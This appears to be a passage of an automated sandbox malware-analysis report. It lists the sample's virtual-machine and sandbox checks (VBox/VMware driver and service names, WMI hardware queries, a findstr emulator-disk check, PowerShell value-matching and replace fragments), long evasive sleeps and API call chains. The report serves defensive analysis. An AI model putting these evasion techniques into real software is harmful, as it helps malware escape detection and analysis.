Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: powershell.exe, 00000009.00000002.1690548235.0000027533723000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: powershell.exe, 00000009.00000002.1690548235.0000027533723000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: VBoxGuest
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: vmci
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: HGFS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: \pipe\VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: VBoxMiniRdrDN
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5296 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4458 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3184
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3723
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6917
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2087
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5108
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1854
Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 401
Source: C:\Windows\System32\lsass.exe Window / User API: threadDelayed 356
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 370
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 360
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 358
Found evasive API chain (may stop execution after accessing registry keys)
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\System32\cmd.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess
Source: C:\Windows\System32\svchost.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Found evasive API chain checking for process token information
Source: C:\Windows\System32\dllhost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Windows\System32\cmd.exe API coverage: 4.5 %
Source: C:\Windows\System32\conhost.exe API coverage: 8.0 %
Source: C:\Windows\System32\conhost.exe API coverage: 8.0 %
Source: C:\Windows\System32\winlogon.exe API coverage: 9.0 %
Source: C:\Windows\System32\lsass.exe API coverage: 8.2 %
Source: C:\Windows\System32\svchost.exe API coverage: 4.1 %
Source: C:\Windows\System32\dwm.exe API coverage: 9.0 %
Source: C:\Windows\System32\svchost.exe API coverage: 8.0 %
Source: C:\Windows\System32\svchost.exe API coverage: 4.5 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6516 Thread sleep count: 5296 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6516 Thread sleep count: 4458 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 400 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3312 Thread sleep count: 3184 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3312 Thread sleep count: 3723 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3084 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2840 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7120 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4376 Thread sleep count: 5108 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4376 Thread sleep count: 1854 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4828 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5580 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 344 Thread sleep count: 283 > 30
Source: C:\Windows\System32\dllhost.exe TID: 5688 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 5804 Thread sleep count: 401 > 30
Source: C:\Windows\System32\winlogon.exe TID: 5804 Thread sleep time: -40100s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 1424 Thread sleep count: 356 > 30
Source: C:\Windows\System32\lsass.exe TID: 1424 Thread sleep time: -35600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2052 Thread sleep count: 370 > 30
Source: C:\Windows\System32\svchost.exe TID: 2052 Thread sleep time: -37000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 4812 Thread sleep count: 178 > 30
Source: C:\Windows\System32\svchost.exe TID: 5756 Thread sleep count: 360 > 30
Source: C:\Windows\System32\svchost.exe TID: 5756 Thread sleep time: -36000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3308 Thread sleep count: 358 > 30
Source: C:\Windows\System32\svchost.exe TID: 3308 Thread sleep time: -35800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3300 Thread sleep count: 294 > 30
Source: C:\Windows\System32\svchost.exe TID: 6176 Thread sleep count: 335 > 30
Source: C:\Windows\System32\svchost.exe TID: 6176 Thread sleep time: -33500s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 896 Thread sleep count: 330 > 30
Source: C:\Windows\System32\svchost.exe TID: 896 Thread sleep time: -33000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3660 Thread sleep count: 320 > 30
Source: C:\Windows\System32\svchost.exe TID: 3660 Thread sleep time: -32000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2760 Thread sleep count: 311 > 30
Source: C:\Windows\System32\svchost.exe TID: 2760 Thread sleep time: -31100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7152 Thread sleep count: 292 > 30
Source: C:\Windows\System32\svchost.exe TID: 3060 Thread sleep count: 308 > 30
Source: C:\Windows\System32\svchost.exe TID: 3060 Thread sleep time: -30800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1028 Thread sleep count: 303 > 30
Source: C:\Windows\System32\svchost.exe TID: 1028 Thread sleep time: -30300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1780 Thread sleep count: 298 > 30
Source: C:\Windows\System32\svchost.exe TID: 5448 Thread sleep count: 291 > 30
Source: C:\Windows\System32\svchost.exe TID: 2780 Thread sleep count: 289 > 30
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEED894 FindFirstFileExW, 20_2_000002527DEED894
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 20_2_000002527DEEDA18
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DF1D894 FindFirstFileExW, 20_2_000002527DF1D894
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DF1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 20_2_000002527DF1DA18
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00000286D7D1D894 FindFirstFileExW, 21_2_00000286D7D1D894
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00000286D7D1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 21_2_00000286D7D1DA18
Source: C:\Windows\System32\conhost.exe Code function: 40_2_000001D54783DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 40_2_000001D54783DA18
Source: C:\Windows\System32\conhost.exe Code function: 40_2_000001D54783D894 FindFirstFileExW, 40_2_000001D54783D894
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF0922D894 FindFirstFileExW, 41_2_000001EF0922D894
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF0922DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 41_2_000001EF0922DA18
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF0942D894 FindFirstFileExW, 41_2_000001EF0942D894
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF0942DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 41_2_000001EF0942DA18
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D1EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 42_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D1ED894 FindFirstFileExW, 42_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D21DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 42_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D21D894 FindFirstFileExW, 42_2_000001CA7D21D894
Source: C:\Windows\System32\lsass.exe Code function: 43_2_0000017D2DD5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 43_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exe Code function: 43_2_0000017D2DD5D894 FindFirstFileExW, 43_2_0000017D2DD5D894
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B92DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 44_2_0000022F4B92DA18
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B92D894 FindFirstFileExW, 44_2_0000022F4B92D894
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B95DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 44_2_0000022F4B95DA18
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B95D894 FindFirstFileExW, 44_2_0000022F4B95D894
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1CDDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 45_2_00000262F1CDDA18
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1CDD894 FindFirstFileExW, 45_2_00000262F1CDD894
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1D0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 45_2_00000262F1D0DA18
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1D0D894 FindFirstFileExW, 45_2_00000262F1D0D894
Source: C:\Windows\System32\svchost.exe Code function: 46_2_0000023942B1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 46_2_0000023942B1DA18
Source: C:\Windows\System32\svchost.exe Code function: 46_2_0000023942B1D894 FindFirstFileExW, 46_2_0000023942B1D894
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF056DD894 FindFirstFileExW, 47_2_000001EF056DD894
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF056DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 47_2_000001EF056DDA18
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF0570D894 FindFirstFileExW, 47_2_000001EF0570D894
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF0570DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 47_2_000001EF0570DA18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
Source: svchost.exe, 00000035.00000002.2582402751.000002A769A42000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000035.00000000.2144910472.000002A769A42000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxservice
Source: svchost.exe, 00000035.00000000.2144910472.000002A769A42000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@vmci
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxsf.sys
Source: svchost.exe, 00000035.00000002.2599511056.000002A76A110000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: svchost.exe, 00000030.00000002.2582876594.000002287A02B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: svchost.exe, 00000035.00000003.2189080671.000002A76A565000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWarVMware SATA CD00
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.53.dr Binary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dcPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: dwm.exe, 0000002D.00000000.2095647683.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: dRomNECVMWarVMware_SATA_
Source: svchost.exe, 00000035.00000003.2189080671.000002A76A565000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: cmd.exe, 00000014.00000003.1681248297.000002527D8A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: svchost.exe, 00000035.00000002.2599511056.000002A76A110000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc
Source: svchost.exe, 00000035.00000002.2599511056.000002A76A110000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk2.06000c298128b8c02a71a2474aeb5f3dcPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: svchost.exe, 00000035.00000003.2173464093.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.53.dr Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: Microsoft-Windows-PowerShell%4Operational.evtx.53.dr Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: svchost.exe, 00000035.00000002.2599511056.000002A76A110000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: LSI_SASVMware Virtual disk 6000c298128b8c02a71a2474aeb5f3dc
Source: dwm.exe, 0000002D.00000000.2095647683.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: svchost.exe, 00000035.00000002.2643052755.000002A76AF0A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMCI: Using capabilities (0x1c).
Source: Microsoft-Windows-PowerShell%4Operational.evtx.53.dr Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: powershell.exe, 00000009.00000002.1690548235.0000027533560000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: qemu-ga
Source: powershell.exe, 00000009.00000002.1690548235.0000027533723000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmware
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: svchost.exe, 00000035.00000002.2599511056.000002A76A110000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 00000035.00000003.2173464093.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: cmd.exe, 00000014.00000003.1690532569.000002527D8C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1689954299.000002527D8C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1690299922.000002527D8C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1690649623.000002527D8C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1681785940.000002527D8C6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1689333508.000002527D8C6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1689704060.000002527D8C6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1691446587.000002527D8C6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1691192247.000002527D8C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: svchost.exe, 00000035.00000000.2147943830.000002A76A49A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmcir:m
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $Hyper-V Time Synchronization Service
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: svchost.exe, 00000035.00000003.2189080671.000002A76A565000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: nonicVMware Virtual disk 6000c298128b8c02a71a2474aeb5f3dc
Source: svchost.exe, 00000035.00000002.2644921249.000002A76C0B6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: dowvmci
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.53.dr Binary or memory string: VMware
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxguest.sys
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxguest.sys`
Source: Microsoft-Windows-PowerShell%4Operational.evtx.53.dr Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: -Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmmouse.sys
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: powershell.exe, 00000009.00000002.1690548235.0000027533560000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: qemuwmi2i
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmusrvc2i
Source: cmd.exe, 00000014.00000003.1689147835.000002527D8F8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1682224430.000002527D8F8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1689227342.000002527D8F8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000003.1682292513.000002527D8F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxsf.sys`
Source: lsass.exe, 0000002B.00000000.2078830491.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicvssNT SERVICE
Source: powershell.exe, 00000009.00000002.1690548235.0000027533560000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: QEMU HARDDISK
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxmouse.sys`
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxmouse.sys
Source: Microsoft-Windows-PowerShell%4Operational.evtx.53.dr Binary or memory string: $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: C:\Program Files\VMware
Source: svchost.exe, 00000035.00000003.2173464093.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VBoxMouse.sys
